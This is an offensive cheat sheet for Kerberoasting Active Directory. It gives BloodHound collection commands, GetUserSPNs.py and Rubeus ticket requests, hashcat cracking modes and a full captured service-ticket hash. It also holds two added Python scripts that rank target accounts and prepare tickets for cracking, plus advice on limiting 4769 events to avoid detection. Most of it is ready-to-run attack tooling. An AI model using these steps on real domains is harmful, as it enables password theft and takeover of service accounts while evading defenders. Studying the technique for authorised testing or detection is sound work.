#############
Kerberoasting
#############

****
INFO
****

| https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
| https://luemmelsec.github.io/Kerberoasting-VS-AS-REP-Roasting/
| Other Windows-related notes: https://gist.github.com/ssstonebraker/a1964b2f20acc8edb239409b6c4906ce

********************
Kerberoastable users
********************

| BloodHound can list Kerberoastable users (user accounts that carry a servicePrincipalName).
| The collectors pull their data over LDAP, so they need valid domain credentials.
| If you already have a compromised host, run SharpHound.exe on it (https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors).
| Otherwise bloodhound-python is a good Linux + remote alternative:

.. code-block:: bash

    pip3 install --upgrade bloodhound
    bloodhound-python --dns-tcp -u 'user' -p 'pass' -ns '10.0.0.1' -d 'domain.local' -c All

| BloodHound stores its graph in a neo4j database, which you need to install (https://neo4j.com/docs/operations-manual/current/installation/linux/debian/#debian-installation).
| When facing issues with the neo4j database:

.. code-block:: bash

    # Clean
    sudo apt-get purge neo4j
    sudo apt-get remove neo4j
    sudo rm -rf /var/lib/neo4j/
    sudo apt autoremove

    # Install
    sudo apt-get install neo4j

    # Specify the Java version if needed. sudo resets the environment by
    # default, so pass JAVA_HOME on the sudo command line rather than exporting it.
    cd /usr/bin
    sudo JAVA_HOME=/usr/lib/jvm/java-1.17.0-openjdk-amd64 ./neo4j console

| Go to https://localhost:7474/
| Default creds: neo4j:neo4j (you are asked to change the password on first login)
| Retrieve the BloodHound GUI here: https://github.com/BloodHoundAD/BloodHound/releases

.. code-block:: bash

    7z x BloodHound-linux-x64.zip
    ./BloodHound.bin --no-sandbox

| Drag & drop the files produced by bloodhound-python into the GUI.
| Select "List all Kerberoastable Accounts" in the Analysis tab.

**********
Kerberoast
**********
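Before requesting tickets it is worth narrowing the target list. The GUI's "List all Kerberoastable Accounts" query is only a filter on the users collection (``hasspn = true``), so the same list can be read straight from the ``*_users.json`` file that bloodhound-python or SharpHound writes, without a working neo4j. The script below is an added example, not part of this page or of the BloodHound project: it keeps enabled user accounts that have at least one SPN, drops krbtgt, and prints them oldest password first with their SPNs. The field names (``Properties.name``, ``samaccountname``, ``hasspn``, ``enabled``, ``serviceprincipalnames``, ``pwdlastset``, ``admincount``) are the ones the collectors emit; the embedded JSON is a constructed sample, not real collection output.

```python
"""List Kerberoastable accounts from a BloodHound users export, offline.

Added example, not code from the page or from BloodHound: applies the same
condition as the GUI's "List all Kerberoastable Accounts" query (User with
hasspn = true) to the *_users.json file the collectors write.
"""
import json
import sys
from datetime import datetime, timezone

# Constructed sample in the collectors' JSON layout; the field names are the
# real ones, the accounts and values are invented for this example.
SAMPLE_USERS_JSON = json.dumps({
    "data": [
        {"Properties": {"name": "SQLSERVICE@DOMAIN.LOCAL", "samaccountname": "SQLService",
                        "enabled": True, "hasspn": True,
                        "serviceprincipalnames": ["MSSQLSvc/sql01.domain.local:1433"],
                        "pwdlastset": 1595866808, "admincount": False}},
        {"Properties": {"name": "KRBTGT@DOMAIN.LOCAL", "samaccountname": "krbtgt",
                        "enabled": False, "hasspn": True,
                        "serviceprincipalnames": ["kadmin/changepw"], "pwdlastset": 1500000000}},
        {"Properties": {"name": "OLDSVC@DOMAIN.LOCAL", "samaccountname": "oldsvc",
                        "enabled": False, "hasspn": True,
                        "serviceprincipalnames": ["HTTP/old.domain.local"], "pwdlastset": 1400000000}},
        {"Properties": {"name": "JDOE@DOMAIN.LOCAL", "samaccountname": "jdoe",
                        "enabled": True, "hasspn": False, "serviceprincipalnames": [],
                        "pwdlastset": 1600000000}},
        {"Properties": {"name": "BACKUPADM@DOMAIN.LOCAL", "samaccountname": "backupadm",
                        "enabled": True, "hasspn": True,
                        "serviceprincipalnames": ["backup/bk01.domain.local",
                                                  "backup/bk02.domain.local"],
                        "pwdlastset": 1420000000, "admincount": True}},
    ],
    "meta": {"type": "users", "count": 5, "version": 4},
})


def load_users(text):
    """Return the user records of a users export (v4 'data' key or older 'users' key)."""
    doc = json.loads(text)
    return doc.get("data") or doc.get("users") or []


def kerberoastable(users, include_disabled=False):
    """Users with at least one SPN, minus krbtgt, sorted oldest password first.

    Disabled accounts are skipped by default: the KDC issues no service ticket
    for them, which is also why the LDAP filter Rubeus uses masks out
    userAccountControl bit 2 (ACCOUNTDISABLE).
    """
    rows = []
    for u in users:
        p = u.get("Properties", {})
        sam = (p.get("samaccountname") or p.get("name", "").split("@")[0]).lower()
        if sam == "krbtgt":
            continue
        if not (p.get("hasspn") or p.get("serviceprincipalnames")):
            continue
        if not include_disabled and not p.get("enabled", True):
            continue
        rows.append({
            "name": p.get("name"),
            "samaccountname": sam,
            "spns": list(p.get("serviceprincipalnames") or []),
            "pwdlastset": p.get("pwdlastset") or 0,
            "admincount": bool(p.get("admincount", False)),
        })
    rows.sort(key=lambda r: r["pwdlastset"])   # old passwords crack first
    return rows


def format_report(rows):
    """One line per account (name, password age, adminCount flag) plus its SPNs."""
    lines = []
    for r in rows:
        if r["pwdlastset"]:
            set_at = datetime.fromtimestamp(r["pwdlastset"], timezone.utc)
            age = f"pwd set {(datetime.now(timezone.utc) - set_at).days} days ago"
        else:
            age = "pwd set: unknown"
        flag = " [adminCount=1]" if r["admincount"] else ""
        lines.append(f"{r['samaccountname']:<20} {age}{flag}")
        lines.extend(f"    {spn}" for spn in r["spns"])
    return lines


if __name__ == "__main__":
    # Usage: python3 kerberoastable.py <timestamp>_users.json   (no argument: built-in sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_USERS_JSON
    print("\n".join(format_report(kerberoastable(load_users(text)))))
```

Accounts flagged with ``adminCount=1`` and very old passwords are the ones to request tickets for first; the rest can wait, which also keeps the number of 4769 events you generate on the DC down.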
.. code-block:: bash

    GetUserSPNs.py -dc-ip 10.0.0.1 domain.local/user:password -request

    # ServicePrincipalName                         Name        MemberOf  PasswordLastSet             LastLogon                   Delegation
    # -------------------------------------------  ----------  --------  --------------------------  --------------------------  ----------
    # TB-ADMIN-DC/SQLService.THROWBACK.local:6792  SQLService            2020-07-27 17:20:08.552650  2020-07-27 17:26:43.628665
    # $krb5tgs$23$*SQLService$THROWBACK.LOCAL$THROWBACK.local/SQLService*$d2e488f1f06ca9b6c7ccd2f7525d20ee$...

| Every ticket requested with ``-request`` shows up as a 4769 event on the DC; a service ticket for a user SPN with encryption type 0x17 (RC4) is the classic Kerberoast detection, so request only the targets you need (``-request-user <account>``).

***********
Crack token
***********

| Put the ticket hash in hash.txt, one hash per line with no line breaks inside a hash:

.. code-block:: bash

    hashcat -m 13100 -a 0 hash.txt rockyou.txt --potfile-path=HASHCATPOT

| Mode 13100 is for RC4-HMAC tickets (``$krb5tgs$23$``). Tickets encrypted with AES come back as ``$krb5tgs$17$`` / ``$krb5tgs$18$`` and need modes 19600 / 19700 instead.

******
Rubeus
******

| Rubeus can perform Kerberoast from a Windows host.
| Retrieve Rubeus.exe here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
| Add ``/nowrap`` to get each hash on a single line; without it the output is wrapped at 80 columns, as below, and the pieces have to be joined before cracking.

.. code-block:: bash

    C:\Users\TBSEC_GUEST>C:\Users\TBSEC_GUEST\Desktop\Rubeus.exe kerberoast
    #    ______        _
    #   (_____ \      | |
    #    _____) )_   _| |__  _____ _   _  ___
    #   |  __  /| | | |  _ \| ___ | | | |/___)
    #   |  | \ \| |_| | |_) ) ____| |_| |___ |
    #   |_|   |_|____/|____/|_____)____/(___/
    #
    #   v2.2.0
    #
    #
    # [*] Action: Kerberoasting
    #
    # [*] NOTICE: AES hashes will be returned for AES-enabled accounts.
    # [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
    #
    # [*] Target Domain          : TBSECURITY.local
    # [*] Searching path 'LDAP://TBSEC-DC01.TBSECURITY.local/DC=TBSECURITY,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
    #
    # [*] Total kerberoastable users : 1
    #
    #
    # [*] SamAccountName         : TBService
    # [*] DistinguishedName      : CN=TBService,OU=Quarantine,DC=TBSECURITY,DC=local
    # [*] ServicePrincipalName   : TBSEC-DC01/TBService.TBSECURITY.local:48064
    # [*] PwdLastSet             : 7/27/2020 4:29:15 PM
    # [*] Supported ETypes       : RC4_HMAC_DEFAULT
    # [*] Hash                   : $krb5tgs$23$*TBService$TBSECURITY.local$TBSEC-DC01/TBService.TBSECURITY.local:48
    #                              064@TBSECURITY.local*$301DDCA6C7592DC078CF1C4A3439A422$4EF4B3828E0AE7E8E8D9A26C6
    #                              6954243FA974126BAA3F9416CAAFBEEDCBE5A3499D533DED965239EBE5DC5B43DA6CDC8F50C4DF5E
    #                              F0A2FDE58B506C6D85319CBD071509B99D8707903DEED23948EEC03C6AD67AD5C506796FF26CC770
    #                              A8FF5C8F85964DD2442673267796FACE7AB69928426763D28E80317530182D306A656CF6DEBFEB85
    #                              9F72B62872723A7ADDF6AD4F8AC9CB1BC57C2861AFB2ED3F1B5C02C2A491B34E9FFD94D538044752
    #                              BBD64F3E4A67A0DB99F0F81D26737EF374B4E91978340FB068360DF35DF64E6FE85B2EAD432F245C
    #                              858D02AC0990230327FDAC5A51ABF66A39031692BBF7F750518F00A4FE95935F6C2A28DA06E9BC0D
    #                              56ABC67E04E8DA59BB99B6B59DD865BA84CB026752BECAB02B76576D8999B60FCE2E509B881CE1FD
    #                              29CB2EF2198E167273793E377736E9167F25B24B8B9EBAE37D8B6EBE948EC60A1616A0A6C07CF866
    #                              AF282138616AF4FF10226D8768A36C9FE1BC2540619646BF43FD51DC26D594938BFC2039912B5DE8
    #                              CFF4510A3465C2F38127FB579157EB3D200C0CE8D519361A05889C2DD9647CC3B8FFEE1EBF01BD7D
    #                              E01F3CC1809FD46598E82957E493B9C941F52D4EB0EB7A3AB74560FEEA5B2873AA4E5AEC465B3F4F
    #                              AA21C753AE87FAA565DD50CF34A3AA1625A768E10B09C6FAB089694669692F7089B2DF93808742D8
    #                              33C2A0F2BB8AA3E4A1185748FD303E61E3CDB507E25C65055D858325AB3D9FD210510F4D158F4448
    #                              639F2E75C8AAC086CF23EE20F3552B94B93022D1C6BBE519F67430977256B7834DC9B6E2EF904167
    #                              9C0AF0B65C8E4AB7AAA3836074D70F8E4A95C221F95574CC7091DC40EE670A0D28DABBC811FA4C7D
    #                              C555A89882C4DCD9AB89CD151AC9FF80CB9EA8DA0ABD98EB6068C2FC8087EF1DD8B2F1C2A9402111
    #                              5946C94948F00B0154DB7823D0F9862B6AF2391C49F8667F6BFEB6EF08189817D4FF67614BDA9358
    #                              4ABF4641DF125B548C8103B1120E2E839BA98F25A5F6AADFE9C63A6279D1375AB99FBFC6CCC87CD4
    #                              1B7D1650B2A48747E07B96AA44E586526E93D11422C491AD290DEC841D299D88CC33F9039181B380
    #                              B69B167C987671D74BFB0E056E8703F26CF509C7932EF21E65A794F744C1422CF20ADA3C6E011DB9
    #                              0D40FD342CBA634BF573B0DFFD8C7788992ABF8BD6D3031BB8470CF30F48B14AC36FD7115F764382
    #                              1C72CCEAC04A87106C8F9B970E4EAEDCECC66FE31E3019604D817E52D16B3578E13CD36D558156C3
    #                              46F6DE486F34A45268527D37D19E474CA500738174FD94316604E43BB60BE6986284D87D52FF383B
    #                              CA9FDD7ABB7830CC65FC625B676C01F14A6B5CD454CC645384E88031F67EB204A7906C3E58237530
    #                              E0017BA084CBE5C23CDC1C37985CF86BCF03C8AE4C5AB11D4D8C6AC3FD95B63C1898EF4AD729D87B
    #                              021034E6FF6C8AA8A7D50DED71415268B4064830CBD1D6B4A5B8C0A532CD67B8F8354AEEC41807F4
    #                              E30A6114D033D3DB5065C60675D5D3F3818B8C8B4A0EB02A6599BAB27B3CF0694DEF771B20F0D6FF
    #                              289
    #
    #

| The same hash joined into a single line, as it has to appear in hash.txt:

.. code-block:: text

    $krb5tgs$23$*TBService$TBSECURITY.local$TBSEC-DC01/TBService.TBSECURITY.local:48064@TBSECURITY.local*$301DDCA6C7592DC078CF1C4A3439A422$4EF4B3828E0AE7E8E8D9A26C66954243FA974126BAA3F9416CAAFBEEDCBE5A3499D533DED965239EBE5DC5B43DA6CDC8F50C4DF5EF0A2FDE58B506C6D85319CBD071509B99D8707903DEED23948EEC03C6AD67AD5C506796FF26CC770A8FF5C8F85964DD2442673267796FACE7AB69928426763D28E80317530182D306A656CF6DEBFEB859F72B62872723A7ADDF6AD4F8AC9CB1BC57C2861AFB2ED3F1B5C02C2A491B34E9FFD94D538044752BBD64F3E4A67A0DB99F0F81D26737EF374B4E91978340FB068360DF35DF64E6FE85B2EAD432F245C858D02AC0990230327FDAC5A51ABF66A39031692BBF7F750518F00A4FE95935F6C2A28DA06E9BC0D56ABC67E04E8DA59BB99B6B59DD865BA84CB026752BECAB02B76576D8999B60FCE2E509B881CE1FD29CB2EF2198E167273793E377736E9167F25B24B8B9EBAE37D8B6EBE948EC60A1616A0A6C07CF866AF282138616AF4FF10226D8768A36C9FE1BC2540619646BF43FD51DC26D594938BFC2039912B5DE8CFF4510A3465C2F38127FB579157EB3D200C0CE8D519361A05889C2DD9647CC3B8FFEE1EBF01BD7DE01F3CC1809FD46598E82957E493B9C941F52D4EB0EB7A3AB74560FEEA5B2873AA4E5AEC465B3F4FAA21C753AE87FAA565DD50CF34A3AA1625A768E10B09C6FAB089694669692F7089B2DF93808742D833C2A0F2BB8AA3E4A1185748FD303E61E3CDB507E25C65055D858325AB3D9FD210510F4D158F4448639F2E75C8AAC086CF23EE20F3552B94B93022D1C6BBE519F67430977256B7834DC9B6E2EF9041679C0AF0B65C8E4AB7AAA3836074D70F8E4A95C221F95574CC7091DC40EE670A0D28DABBC811FA4C7DC555A89882C4DCD9AB89CD151AC9FF80CB9EA8DA0ABD98EB6068C2FC8087EF1DD8B2F1C2A94021115946C94948F00B0154DB7823D0F9862B6AF2391C49F8667F6BFEB6EF08189817D4FF67614BDA93584ABF4641DF125B548C8103B1120E2E839BA98F25A5F6AADFE9C63A6279D1375AB99FBFC6CCC87CD41B7D1650B2A48747E07B96AA44E586526E93D11422C491AD290DEC841D299D88CC33F9039181B380B69B167C987671D74BFB0E056E8703F26CF509C7932EF21E65A794F744C1422CF20ADA3C6E011DB90D40FD342CBA634BF573B0DFFD8C7788992ABF8BD6D3031BB8470CF30F48B14AC36FD7115F7643821C72CCEAC04A87106C8F9B970E4EAEDCECC66FE31E3019604D817E52D16B3578E13CD36D558156C346F6DE486F34A45268527D37D19E474CA500738174FD94316604E43BB60BE6986284D87D52FF383BCA9FDD7ABB7830CC65FC625B676C01F14A6B5CD454CC645384E88031F67EB204A7906C3E58237530E0017BA084CBE5C23CDC1C37985CF86BCF03C8AE4C5AB11D4D8C6AC3FD95B63C1898EF4AD729D87B021034E6FF6C8AA8A7D50DED71415268B4064830CBD1D6B4A5B8C0A532CD67B8F8354AEEC41807F4E30A6114D033D3DB5065C60675D5D3F3818B8C8B4A0EB02A6599BAB27B3CF0694DEF771B20F0D6FF289
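Two things go wrong between the output above and hashcat: Rubeus without ``/nowrap`` splits the hash mid-hex, and AES-enabled accounts come back as ``$krb5tgs$17$`` / ``$krb5tgs$18$`` (the NOTICE line above says so), which mode 13100 rejects. The script below is an added example, not code from the page, Rubeus, Impacket or hashcat: it re-joins wrapped Rubeus output, checks each hash against the ``$krb5tgs$`` layout (etype, user, realm, optional ``*spn*``, checksum of the size that etype uses, even-length hex ciphertext) and sorts the hashes into one file per hashcat mode. The mode numbers (13100, 19600, 19700) and checksum sizes (16 bytes for RC4-HMAC, 12 for the AES types) are the published ones; the embedded Rubeus snippet and the AES hash are constructed samples with shortened ciphertext, not captured tickets.

```python
"""Triage Kerberoast output before cracking (added example, not from the page,
Rubeus, Impacket or hashcat): re-join Rubeus' 80-column-wrapped hashes, validate
the $krb5tgs$ layout and pick the hashcat mode from the encryption type."""
import re
from collections import defaultdict

# etype -> (hashcat mode, checksum length in hex chars): RC4-HMAC tickets carry
# a 16-byte checksum, the AES-CTS-HMAC-SHA1-96 types a 12-byte one.
ETYPE_INFO = {23: (13100, 32), 17: (19600, 24), 18: (19700, 24)}
HEX_RE = re.compile(r"[0-9a-fA-F]+")


def extract_rubeus_hashes(console_output):
    """Re-join hashes from Rubeus console output.

    Without /nowrap Rubeus breaks the hash mid-hex at 80 columns: every non-blank
    line after '[*] Hash :' that does not start another '[*]' field is a
    continuation and is appended without a separator. A leading '#' (this page
    comments every output line) is stripped first.
    """
    hashes, current = [], None
    for raw in console_output.splitlines():
        line = raw.strip().lstrip("#").strip()
        if line.startswith("[*] Hash"):
            if current is not None:
                hashes.append(current)
            current = line.split(":", 1)[1].strip()
        elif current is not None and line and not line.startswith("["):
            current += line
        elif current is not None:
            hashes.append(current)
            current = None
    if current is not None:
        hashes.append(current)
    return hashes


def parse_krb5tgs(line):
    """Split a $krb5tgs$ hash into fields; raise ValueError if malformed.

    Layouts: '$krb5tgs$23$*user$realm$spn*$cksum$edata' (RC4; Impacket, Rubeus)
    and '$krb5tgs$17|18$user$realm$*spn*$cksum$edata' (AES; Rubeus). '*spn*' is optional.
    """
    line = line.strip()
    if not line.startswith("$krb5tgs$"):
        raise ValueError("not a $krb5tgs$ hash")
    etype_s, rest = line[len("$krb5tgs$"):].split("$", 1)
    etype = int(etype_s)
    if etype not in ETYPE_INFO:
        raise ValueError(f"unsupported etype {etype}")
    mode, cksum_len = ETYPE_INFO[etype]
    spn = None
    if rest.startswith("*"):                      # RC4 layout: *user$realm$spn*$...
        head, rest = rest[1:].split("*$", 1)
        user, realm, spn = head.split("$", 2)
    else:                                         # AES layout: user$realm$[*spn*$]...
        user, realm, rest = rest.split("$", 2)
        if rest.startswith("*"):
            spn, rest = rest[1:].split("*$", 1)
    checksum, edata = rest.split("$", 1)
    if len(checksum) != cksum_len or not HEX_RE.fullmatch(checksum):
        raise ValueError(f"etype {etype} needs a {cksum_len}-hex checksum, got {len(checksum)}")
    if not HEX_RE.fullmatch(edata) or len(edata) % 2:
        raise ValueError("ciphertext is not even-length hex (lost wrap line or truncated copy?)")
    return {"etype": etype, "mode": mode, "user": user, "realm": realm, "spn": spn,
            "checksum": checksum.lower(), "edata": edata.lower()}


def is_valid(line):
    """True when parse_krb5tgs accepts the hash."""
    try:
        parse_krb5tgs(line)
        return True
    except ValueError:
        return False


def triage(hash_lines):
    """Group hashes by hashcat mode: {mode: [hash, ...]}; a malformed line raises."""
    by_mode = defaultdict(list)
    for h in hash_lines:
        by_mode[parse_krb5tgs(h)["mode"]].append(h.strip())
    return dict(by_mode)


def hashcat_commands(by_mode, wordlist="rockyou.txt"):
    """One hashcat invocation per mode, mirroring the page's cracking step."""
    return [f"hashcat -m {m} -a 0 kerberoast_{m}.txt {wordlist}" for m in sorted(by_mode)]


# Constructed sample modelled on the Rubeus output above; the ciphertext is
# shortened and this is not a real ticket.
SAMPLE_RUBEUS = """\
# [*] Supported ETypes       : RC4_HMAC_DEFAULT
# [*] Hash                   : $krb5tgs$23$*TBService$TBSECURITY.local$TBSEC-DC01/TBService.TBSECURITY.local:48
#                              064@TBSECURITY.local*$301DDCA6C7592DC078CF1C4A3439A422$4EF4B3828E0AE7E8E8D9A26C6
#                              6954243FA974126BAA3F9416CAAFBEEDCBE5A3499D533DED965239EBE5DC5B43DA6CDC8F50C4DF5E
#                              F0A2FDE58B506C6D85319CBD071509B99D8
#
"""
# Constructed AES256 hash in the Rubeus layout; checksum and ciphertext are placeholders.
SAMPLE_AES = ("$krb5tgs$18$svc_sql$CORP.LOCAL$*MSSQLSvc/sql01.corp.local:1433*$"
              "0123456789abcdef01234567$" + "deadbeef" * 4)

if __name__ == "__main__":
    groups = triage(extract_rubeus_hashes(SAMPLE_RUBEUS) + [SAMPLE_AES])
    for mode, hashes in sorted(groups.items()):
        with open(f"kerberoast_{mode}.txt", "w") as fh:   # one input file per hashcat mode
            fh.write("\n".join(hashes) + "\n")
        print(f"mode {mode}: {len(hashes)} hash(es) -> kerberoast_{mode}.txt")
    print("\n".join(hashcat_commands(groups)))
```

Feed real Rubeus output in through ``extract_rubeus_hashes`` (or use ``/nowrap`` and skip it) and GetUserSPNs.py output straight into ``triage``; a hash that fails the checksum or even-length check was mangled on the way to your notes and is not worth GPU time until it is re-copied.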